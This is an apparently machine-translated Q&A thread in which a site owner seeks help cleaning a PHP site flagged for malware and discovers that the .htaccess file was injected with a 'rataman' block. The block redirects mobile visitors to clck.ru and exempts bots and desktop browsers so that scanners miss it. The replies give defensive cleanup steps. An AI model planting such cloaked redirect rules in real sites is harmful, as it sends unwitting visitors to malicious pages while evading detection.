PHP网站上的恶意软件,参考clck.ru
我有一个网站,它显然包含恶意软件根据。它引用了一些指向PHP网站上的恶意软件,参考clck.ru,php,mysql,apache,malware,Php,Mysql,Apache,Malware,我有一个网站,它显然包含恶意软件根据。它引用了一些指向clck.ru的链接 查看代码时没有提到clck.ru或类似内容 我运行了maldetect(在Ubuntu操作系统上),发现了一些文件,我已经删除了这些文件 我已经更新了所有应用程序并重新启动了系统 但是Sucuri SiteCheck仍然无法验证站点是否干净 我指的网站是cphdans.dk。有人能帮我做更多的事吗 可能是某种SQL注入黑客,所以我应该在MySQL数据库中搜索一些东西(没有找到clck.ru) 更新: .htaccess文
clck.ru
的链接
查看代码时没有提到clck.ru
或类似内容
我运行了maldetect(在Ubuntu操作系统上),发现了一些文件,我已经删除了这些文件
我已经更新了所有应用程序并重新启动了系统
但是Sucuri SiteCheck仍然无法验证站点是否干净
我指的网站是cphdans.dk。有人能帮我做更多的事吗
可能是某种SQL注入黑客,所以我应该在MySQL数据库中搜索一些东西(没有找到clck.ru)
更新:
.htaccess
文件被以下代码破坏:
#########rataman##########
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,$
RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu9$
RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|a$
RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
RewriteCond %{HTTP:Profile} .+ [NC,OR]
RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]
RewriteCond %{QUERY_STRING} !noredirect [NC]
RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleW$
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|ameri$
RewriteRule ^(.*)$ http://clck.ru/8sNeJ [L,R=302]
#########!rataman!#########
很抱歉听到这个消息。代码可能通过
base64
和eval
被隐藏。这东西真恶心。它是什么样的系统?您能将代码库与同一软件的干净副本进行比较吗?就像你在服务器上有一个站点,但是你在另一个目录中有一个干净的备份,比如在开发或登台服务器上?原因是,如果您这样做,您可以看到哪些文件可能已更改
我做的两种方法是使用diff
和rsync
进行CRC检查。首先是一个简单的diff
:
diff -Naur /path/to/infected/code/ /path/to/clean/code/
但我发现在干运行模式下使用rsync
(选项n)和CRC选项
c`set效果更好:
rsync -rvnc /path/to/infected/code/ /path/to/clean/code/
您可能会发现以下部分或全部内容:
hello.php
文件。但是一些恶意软件会创建一个hello1.php
文件或类似的接近文件名,但不是确切的文件名尝试查找
eval
调用,查看.htaccess
文件,也可以通过它来完成,也可以是MySQL数据库中的广告或文章的一部分
也可以尝试使用,它们可能会为您提供更多信息。(我似乎更信任谷歌,而不是Sucuri网站,但这只是我的观点)。另外,如果你想了解更多关于网站如何发生这种情况的信息,等等。你应该将你的问题发布在网站上。事实上,是.htaccess被泄露了!谢谢你,纳塔斯。我怎样才能给你正确的答案?谢谢你的帮助。是.htaccess文件被泄露了!是的!另一个猜测我没有补充。但很高兴你摆脱了它。但也不要期望恶意软件检查网站上的警告马上消失。像这样的网站可能需要一两天的时间来重新检查网站。但如果你的网站是干净的,你将结帐干净。